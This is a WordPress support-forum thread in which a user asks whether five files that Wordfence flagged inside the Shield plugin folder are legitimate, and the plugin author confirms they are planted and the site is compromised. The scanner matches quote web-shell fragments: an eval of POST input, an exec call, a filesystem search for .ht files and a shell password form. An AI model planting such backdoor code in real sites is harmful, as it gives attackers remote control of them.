Malicious files

  • Resolved dianemk

    (@dianemk)


    5 years, 5 months ago

    I’m scanning all my sites with Wordfence because Shield didn’t pick up on a hack on one site, so I’m now going through all my sites with Wordfence. It has flagged 5 potential problems in the wp-content/plugins/wp-simple-firewall path, which are:
    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/lib/Twig/Extension/feed.php
    The matched text in this file is: find / -type f -name .ht

    wp-content/plugins/wp-simple-firewall/src/lib/vendor/nesbot/carbon/src/Carbon/Lang/cache.php
    The matched text in this file is: eval($_POST[‘eval’]);

    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/lib/Twig/Node/Expression/cron.php
    The matched text in this file is: function_exists(‘exec’)) {\x0d\x0a\x09\x09\x09@exec($cfe, $res);

    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/src/Node/Expression/Test/ajax.php
    The matched text in this file is: 

    <form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form>

    Are these legitimate Shield files? I’m not getting this on other sites with Shield.
    Thanks

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author One Dollar Plugin

    (@onedollarplugin)

    Nope, these are not legitimate Shield files so it looks like your site’s been compromised. Shield has a plugin guard feature in there that would detect this and help repair such a compromise, though this is a Pro-only feature which wouldn’t be active unless you’d upgraded for the additional features.

    Thread Starter dianemk

    (@dianemk)

    I understand that I’m using the free version and so there will be limitations but I have to say that I’m pretty shocked that it was a free version of Wordfence that alerted me to modifications in Shield files, and not Shield.

    Plugin Author One Dollar Plugin

    (@onedollarplugin)

    The nature of this is that it can turn up absolutely anywhere. If the scan isn’t being run, then it wont get picked up. The irony is that the files were placed inside the Shield folder, but again, they could be placed anywhere.

    If you feel that the free version of another security plugin works better for your site than the free version of Shield, then we encourage you to make the switch. You have to make the decision you feel is best for your sites.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Malicious files’ is closed to new replies.